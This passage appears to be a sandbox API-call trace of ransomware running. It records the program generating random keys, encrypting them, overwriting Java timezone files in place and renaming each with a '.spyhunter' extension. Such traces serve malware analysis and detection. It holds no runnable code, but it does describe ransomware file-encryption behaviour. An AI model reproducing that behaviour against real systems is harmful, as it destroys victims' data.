pdwDataLen=0x25ce470*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce470*=0x30) returned 1 [0171.545] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Chihuahua" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\chihuahua"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0171.546] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Chihuahua") returned 61 [0171.546] StrStrW (lpFirst="Chihuahua", lpSrch=".txt") returned 0x0 [0171.546] GetProcessHeap () returned 0x2c0000 [0171.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0171.546] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce434, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce434*=0x330, lpOverlapped=0x0) returned 1 [0171.580] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffcd0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.580] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x25ce434, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce434*=0x330, lpOverlapped=0x0) returned 1 [0171.580] GetProcessHeap () returned 0x2c0000 [0171.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0171.580] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.581] WriteFile (in: hFile=0x178, lpBuffer=0x25ce474*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce434, lpOverlapped=0x0 | out: lpBuffer=0x25ce474*, lpNumberOfBytesWritten=0x25ce434*=0x4, lpOverlapped=0x0) returned 1 [0171.581] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce434, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce434*=0x30, lpOverlapped=0x0) returned 1 [0171.581] CloseHandle (hObject=0x178) returned 1 [0171.581] GetProcessHeap () returned 0x2c0000 [0171.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.581] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Chihuahua.spyhunter") returned 71 [0171.581] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Chihuahua" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\chihuahua"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Chihuahua.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\chihuahua.spyhunter")) returned 1 [0171.582] GetProcessHeap () returned 0x2c0000 [0171.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.582] GetProcessHeap () returned 0x2c0000 [0171.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0171.582] GetProcessHeap () returned 0x2c0000 [0171.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc0118 | out: hHeap=0x2c0000) returned 1 [0171.583] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce478 | out: pbBuffer=0x25ce478) returned 1 [0171.583] GetProcessHeap () returned 0x2c0000 [0171.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0171.583] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce470*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce470*=0x30) returned 1 [0171.583] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cambridge_Bay" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cambridge_bay"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0171.585] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cambridge_Bay") returned 65 [0171.585] StrStrW (lpFirst="Cambridge_Bay", lpSrch=".txt") returned 0x0 [0171.585] GetProcessHeap () returned 0x2c0000 [0171.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0171.585] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce434, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce434*=0x434, lpOverlapped=0x0) returned 1 [0171.693] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffbcc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.693] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x434, lpNumberOfBytesWritten=0x25ce434, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce434*=0x434, lpOverlapped=0x0) returned 1 [0171.693] GetProcessHeap () returned 0x2c0000 [0171.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0171.693] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.693] WriteFile (in: hFile=0x178, lpBuffer=0x25ce474*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce434, lpOverlapped=0x0 | out: lpBuffer=0x25ce474*, lpNumberOfBytesWritten=0x25ce434*=0x4, lpOverlapped=0x0) returned 1 [0171.693] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce434, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce434*=0x30, lpOverlapped=0x0) returned 1 [0171.693] CloseHandle (hObject=0x178) returned 1 [0171.693] GetProcessHeap () returned 0x2c0000 [0171.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.694] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cambridge_Bay.spyhunter") returned 75 [0171.694] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cambridge_Bay" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cambridge_bay"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cambridge_Bay.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cambridge_bay.spyhunter")) returned 1 [0171.695] GetProcessHeap () returned 0x2c0000 [0171.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.695] GetProcessHeap () returned 0x2c0000 [0171.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0171.695] GetProcessHeap () returned 0x2c0000 [0171.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e04108 | out: hHeap=0x2c0000) returned 1 [0171.695] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce470 | out: pbBuffer=0x25ce470) returned 1 [0171.695] GetProcessHeap () returned 0x2c0000 [0171.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0171.695] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce468*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce468*=0x30) returned 1 [0171.696] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Boise" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\boise"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0171.696] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Boise") returned 57 [0171.696] StrStrW (lpFirst="Boise", lpSrch=".txt") returned 0x0 [0171.696] GetProcessHeap () returned 0x2c0000 [0171.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0171.696] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce42c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce42c*=0x504, lpOverlapped=0x0) returned 1 [0171.704] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffafc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.704] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x504, lpNumberOfBytesWritten=0x25ce42c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce42c*=0x504, lpOverlapped=0x0) returned 1 [0171.704] GetProcessHeap () returned 0x2c0000 [0171.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0171.704] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.704] WriteFile (in: hFile=0x178, lpBuffer=0x25ce46c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce42c, lpOverlapped=0x0 | out: lpBuffer=0x25ce46c*, lpNumberOfBytesWritten=0x25ce42c*=0x4, lpOverlapped=0x0) returned 1 [0171.704] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce42c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce42c*=0x30, lpOverlapped=0x0) returned 1 [0171.704] CloseHandle (hObject=0x178) returned 1 [0171.704] GetProcessHeap () returned 0x2c0000 [0171.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.705] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Boise.spyhunter") returned 67 [0171.705] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Boise" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\boise"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Boise.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\boise.spyhunter")) returned 1 [0171.706] GetProcessHeap () returned 0x2c0000 [0171.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.706] GetProcessHeap () returned 0x2c0000 [0171.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0171.706] GetProcessHeap () returned 0x2c0000 [0171.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60540 | out: hHeap=0x2c0000) returned 1 [0171.706] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce470 | out: pbBuffer=0x25ce470) returned 1 [0171.706] GetProcessHeap () returned 0x2c0000 [0171.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0171.706] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce468*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce468*=0x30) returned 1 [0171.706] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Blanc-Sablon" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\blanc-sablon"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0171.707] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Blanc-Sablon") returned 64 [0171.707] StrStrW (lpFirst="Blanc-Sablon", lpSrch=".txt") returned 0x0 [0171.707] GetProcessHeap () returned 0x2c0000 [0171.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0171.707] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce42c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce42c*=0x5d, lpOverlapped=0x0) returned 1 [0171.708] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffa3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.708] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x5d, lpNumberOfBytesWritten=0x25ce42c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce42c*=0x5d, lpOverlapped=0x0) returned 1 [0171.708] GetProcessHeap () returned 0x2c0000 [0171.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0171.708] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.708] WriteFile (in: hFile=0x178, lpBuffer=0x25ce46c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce42c, lpOverlapped=0x0 | out: lpBuffer=0x25ce46c*, lpNumberOfBytesWritten=0x25ce42c*=0x4, lpOverlapped=0x0) returned 1 [0171.708] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce42c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce42c*=0x30, lpOverlapped=0x0) returned 1 [0171.709] CloseHandle (hObject=0x178) returned 1 [0171.709] GetProcessHeap () returned 0x2c0000 [0171.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.709] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Blanc-Sablon.spyhunter") returned 74 [0171.709] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Blanc-Sablon" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\blanc-sablon"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Blanc-Sablon.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\blanc-sablon.spyhunter")) returned 1 [0171.710] GetProcessHeap () returned 0x2c0000 [0171.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.710] GetProcessHeap () returned 0x2c0000 [0171.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0171.710] GetProcessHeap () returned 0x2c0000 [0171.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e04448 | out: hHeap=0x2c0000) returned 1 [0171.710] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce468 | out: pbBuffer=0x25ce468) returned 1 [0171.710] GetProcessHeap () returned 0x2c0000 [0171.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0171.710] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce460*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce460*=0x30) returned 1 [0171.710] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Belize" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\belize"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0171.711] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Belize") returned 58 [0171.712] StrStrW (lpFirst="Belize", lpSrch=".txt") returned 0x0 [0171.712] GetProcessHeap () returned 0x2c0000 [0171.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0171.712] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce424, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce424*=0x201, lpOverlapped=0x0) returned 1 [0171.712] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffdff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.712] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x201, lpNumberOfBytesWritten=0x25ce424, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce424*=0x201, lpOverlapped=0x0) returned 1 [0171.713] GetProcessHeap () returned 0x2c0000 [0171.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0171.713] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.713] WriteFile (in: hFile=0x178, lpBuffer=0x25ce464*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce424, lpOverlapped=0x0 | out: lpBuffer=0x25ce464*, lpNumberOfBytesWritten=0x25ce424*=0x4, lpOverlapped=0x0) returned 1 [0171.713] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce424, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce424*=0x30, lpOverlapped=0x0) returned 1 [0171.713] CloseHandle (hObject=0x178) returned 1 [0171.713] GetProcessHeap () returned 0x2c0000 [0171.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.713] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Belize.spyhunter") returned 68 [0171.713] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Belize" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\belize"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Belize.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\belize.spyhunter")) returned 1 [0171.714] GetProcessHeap () returned 0x2c0000 [0171.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.714] GetProcessHeap () returned 0x2c0000 [0171.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0171.714] GetProcessHeap () returned 0x2c0000 [0171.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e603c0 | out: hHeap=0x2c0000) returned 1 [0171.714] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce468 | out: pbBuffer=0x25ce468) returned 1 [0171.714] GetProcessHeap () returned 0x2c0000 [0171.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0171.715] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce460*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce460*=0x30) returned 1 [0171.715] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Belem" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\belem"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0171.715] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Belem") returned 57 [0171.715] StrStrW (lpFirst="Belem", lpSrch=".txt") returned 0x0 [0171.715] GetProcessHeap () returned 0x2c0000 [0171.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0171.716] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce424, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce424*=0x129, lpOverlapped=0x0) returned 1 [0171.716] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffed7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.716] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x129, lpNumberOfBytesWritten=0x25ce424, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce424*=0x129, lpOverlapped=0x0) returned 1 [0171.716] GetProcessHeap () returned 0x2c0000 [0171.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0171.717] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.717] WriteFile (in: hFile=0x178, lpBuffer=0x25ce464*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce424, lpOverlapped=0x0 | out: lpBuffer=0x25ce464*, lpNumberOfBytesWritten=0x25ce424*=0x4, lpOverlapped=0x0) returned 1 [0171.717] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce424, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce424*=0x30, lpOverlapped=0x0) returned 1 [0171.717] CloseHandle (hObject=0x178) returned 1 [0171.717] GetProcessHeap () returned 0x2c0000 [0171.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.717] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Belem.spyhunter") returned 67 [0171.717] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Belem" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\belem"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Belem.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\belem.spyhunter")) returned 1 [0171.718] GetProcessHeap () returned 0x2c0000 [0171.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.718] GetProcessHeap () returned 0x2c0000 [0171.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0171.718] GetProcessHeap () returned 0x2c0000 [0171.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60300 | out: hHeap=0x2c0000) returned 1 [0171.718] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce460 | out: pbBuffer=0x25ce460) returned 1 [0171.718] GetProcessHeap () returned 0x2c0000 [0171.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0171.718] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce458*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce458*=0x30) returned 1 [0171.719] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Barbados" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\barbados"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0171.719] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Barbados") returned 60 [0171.719] StrStrW (lpFirst="Barbados", lpSrch=".txt") returned 0x0 [0171.719] GetProcessHeap () returned 0x2c0000 [0171.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0171.719] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce41c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce41c*=0x89, lpOverlapped=0x0) returned 1 [0171.720] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff77, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.720] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x89, lpNumberOfBytesWritten=0x25ce41c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce41c*=0x89, lpOverlapped=0x0) returned 1 [0171.720] GetProcessHeap () returned 0x2c0000 [0171.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0171.720] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.720] WriteFile (in: hFile=0x178, lpBuffer=0x25ce45c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce41c, lpOverlapped=0x0 | out: lpBuffer=0x25ce45c*, lpNumberOfBytesWritten=0x25ce41c*=0x4, lpOverlapped=0x0) returned 1 [0171.721] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, 